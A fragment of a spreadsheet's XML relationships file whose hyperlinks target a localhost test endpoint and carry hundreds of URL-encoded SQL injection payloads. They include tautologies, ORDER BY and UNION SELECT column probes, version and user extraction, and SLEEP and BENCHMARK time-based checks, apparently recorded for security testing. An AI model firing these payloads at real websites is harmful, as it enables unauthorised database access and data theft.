Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20@@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL--%20" TargetMode="External"/><Relationship Id="rId408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--%20" TargetMode="External"/><Relationship Id="rId212" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5--%20" TargetMode="External"/><Relationship Id="rId254" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16" TargetMode="External"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%2010--%20" TargetMode="External"/><Relationship Id="rId114" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%2013%20" TargetMode="External"/><Relationship Id="rId296" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28%23" TargetMode="External"/><Relationship Id="rId461" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20AND%205650=CONVERT(INT,(UNION%20ALL%20SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))" TargetMode="External"/><Relationship Id="rId517" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8--%20" TargetMode="External"/><Relationship Id="rId559" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20%23" TargetMode="External"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%2021--%20" TargetMode="External"/><Relationship Id="rId156" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11" TargetMode="External"/><Relationship Id="rId198" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21%23" TargetMode="External"/><Relationship Id="rId321" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--%20" TargetMode="External"/><Relationship Id="rId363" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8%23" TargetMode="External"/><Relationship Id="rId419" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20AND%205650=CONVERT(INT,(UNION%20ALL%20SELECTCHAR(88)+CHAR(88)+CHAR(88)))--%20" TargetMode="External"/><Relationship Id="rId570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23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15--%20" TargetMode="External"/><Relationship Id="rId43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--%20" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20HAVING%201=1--%20" TargetMode="External"/><Relationship Id="rId265" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27" TargetMode="External"/><Relationship Id="rId47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" TargetMode="External"/><Relationship Id="rId528" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--%20" TargetMode="External"/><Relationship Id="rId125" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%2024%20" TargetMode="External"/><Relationship Id="rId167" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21" TargetMode="External"/><Relationship Id="rId332" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6" TargetMode="External"/><Relationship Id="rId374" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19%23" TargetMode="External"/><Relationship Id="rId581" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20AND%207300=7300%20AND%20('pKlZ'='pKlZ" TargetMode="External"/><Relationship Id="rId71" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%201%23%20" TargetMode="External"/><Relationship Id="rId234" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--%20" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20OR%201=1%23" TargetMode="External"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20AS%20INJECTX%20WHERE%201=1%20AND%201=0" TargetMode="External"/><Relationship Id="rId276" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8%23" TargetMode="External"/><Relationship Id="rId441" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20AND%205650=CONVERT(INT,(UNION%20ALL%20SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))%23" TargetMode="External"/><Relationship Id="rId483" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4" TargetMode="External"/><Relationship Id="rId539" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--%20" TargetMode="External"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%201--%20" TargetMode="External"/><Relationship Id="rId136" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=31%20or%20sleep(5)%23" TargetMode="External"/><Relationship Id="rId178" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5)%23" TargetMode="External"/><Relationship Id="rId301" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3--%20" TargetMode="External"/><Relationship Id="rId343" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17" TargetMode="External"/><Relationship Id="rId550" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11%23" TargetMode="External"/><Relationship Id="rId82" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%2012%23%20" TargetMode="External"/><Relationship Id="rId203" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26%23" TargetMode="External"/><Relationship Id="rId385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%23" TargetMode="External"/><Relationship Id="rId592" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3'%5C%22" TargetMode="External"/><Relationship Id="rId245" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7" TargetMode="External"/><Relationship Id="rId287" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19%23" TargetMode="External"/><Relationship Id="rId410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--%20" TargetMode="External"/><Relationship Id="rId45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%23" TargetMode="External"/><Relationship Id="rId494" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15" TargetMode="External"/><Relationship Id="rId508" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29" TargetMode="External"/><Relationship Id="rId105" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%204%20" TargetMode="External"/><Relationship Id="rId147" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%20SLEEP(5)" TargetMode="External"/><Relationship Id="rId312" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14--%20" TargetMode="External"/><Relationship Id="rId354" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28" TargetMode="External"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%2012--%20" TargetMode="External"/><Relationship Id="rId93" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%2023%23%20" TargetMode="External"/><Relationship Id="rId189" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13%23" TargetMode="External"/><Relationship Id="rId396" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20@@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL--%20" TargetMode="External"/><Relationship Id="rId561" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22%23" TargetMode="External"/><Relationship Id="rId214" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7--%20" TargetMode="External"/><Relationship Id="rId256" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18" TargetMode="External"/><Relationship Id="rId298" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30%23" TargetMode="External"/><Relationship Id="rId421" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20AND%205650=CONVERT(INT,(UNION%20ALL%20SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))--%20" TargetMode="External"/><Relationship Id="rId463" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20AND%205650=CONVERT(INT,(UNION%20ALL%20SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)))" TargetMode="External"/><Relationship Id="rId519" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10--%20" TargetMode="External"/><Relationship Id="rId116" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%2015%20" TargetMode="External"/><Relationship Id="rId158" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13" TargetMode="External"/><Relationship Id="rId323" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--%20" TargetMode="External"/><Relationship Id="rId530" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--%20" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20AND%201=1" TargetMode="External"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%2023--%20" TargetMode="External"/><Relationship Id="rId365" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10%23" TargetMode="External"/><Relationship Id="rId572" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%27%20AND%20(SELECT%209105%20FROM%20(SELECT(SLEEP(5)))WTmQ)%20AND%20%27Seyf%27=%27Seyf" TargetMode="External"/><Relationship Id="rId225" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17--%20" TargetMode="External"/><Relationship Id="rId267" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29" TargetMode="External"/><Relationship Id="rId43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--%20" TargetMode="External"/><Relationship Id="rId47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" TargetMode="External"/><Relationship Id="rId127" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%2026%20" TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20AS%20INJECTX%20WHERE%201=1%20AND%201=0%23" TargetMode="External"/><Relationship Id="rId73" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%203%23%20" TargetMode="External"/><Relationship Id="rId169" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23" TargetMode="External"/><Relationship Id="rId334" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8" TargetMode="External"/><Relationship Id="rId376" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21%23" TargetMode="External"/><Relationship Id="rId541" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2%23" TargetMode="External"/><Relationship Id="rId583" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20OR%203409=3409%20AND%20('pytW'%20LIKE%20'pytW" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20OR%20x=y" TargetMode="External"/><Relationship Id="rId180" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),3,4%23" TargetMode="External"/><Relationship Id="rId236" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28--%20" TargetMode="External"/><Relationship Id="rId278" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10%23" TargetMode="External"/><Relationship Id="rId401" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20@@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20" TargetMode="External"/><Relationship Id="rId443" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20AND%205650=CONVERT(INT,(UNION%20ALL%20SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)))%23" TargetMode="External"/><Relationship Id="rId303" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5--%20" TargetMode="External"/><Relationship Id="rId485" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6" TargetMode="External"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%203--%20" TargetMode="External"/><Relationship Id="rId84" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%2014%23%20" TargetMode="External"/><Relationship Id="rId138" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3or%20pg_SLEEP(5)--" TargetMode="External"/><Relationship Id="rId345" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19" TargetMode="External"/><Relationship Id="rId387" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20SLEEP(5)--%20" TargetMode="External"/><Relationship Id="rId510" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX'--%20" TargetMode="External"/><Relationship Id="rId552" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12,13%23" TargetMode="External"/><Relationship Id="rId594" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20and%20(select%20substring(@@version,3,1))='S'" TargetMode="External"/><Relationship Id="rId191" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14%23" TargetMode="External"/><Relationship Id="rId205" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28%23" TargetMode="External"/><Relationship Id="rId247" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9" TargetMode="External"/><Relationship Id="rId412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--%20" TargetMode="External"/><Relationship Id="rId107" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%206%20" TargetMode="External"/><Relationship Id="rId289" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21%23" TargetMode="External"/><Relationship Id="rId45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%23" TargetMode="External"/><Relationship Id="rId496" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20OR%201=0--%20" TargetMode="External"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:8081/category/view?id=3%20UNION%20ALL%20SELECT%201,2,3,4,5,6%23" TargetMode="External"/><Relationship Id="rId149" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4" TargetMode="External"/><Relationship Id="rId314" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16--%20" TargetMode="External"/><Relationship Id="rId356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" TargetMode="External"/><Relationship Id="rId398" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20@@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5(%27A%27)),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20" TargetMode="External"/><Relationship Id="rId521" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12--%20" TargetMode="External"/><Relationship Id="rId563" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24%23" TargetMode="External"/><Relationship Id="rId95" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%2025%23%20" TargetMode="External"/><Relationship Id="rId160" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14" TargetMode="External"/><Relationship Id="rId216" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9--%20" TargetMode="External"/><Relationship Id="rId423" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20AND%205650=CONVERT(INT,(UNION%20ALL%20SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)))--%20" TargetMode="External"/><Relationship Id="rId258" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20" TargetMode="External"/><Relationship Id="rId465" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20AND%205650=CONVERT(INT,(UNION%20ALL%20SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)))" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20AND%201=1--%20" TargetMode="External"/><Relationship Id="rId64" 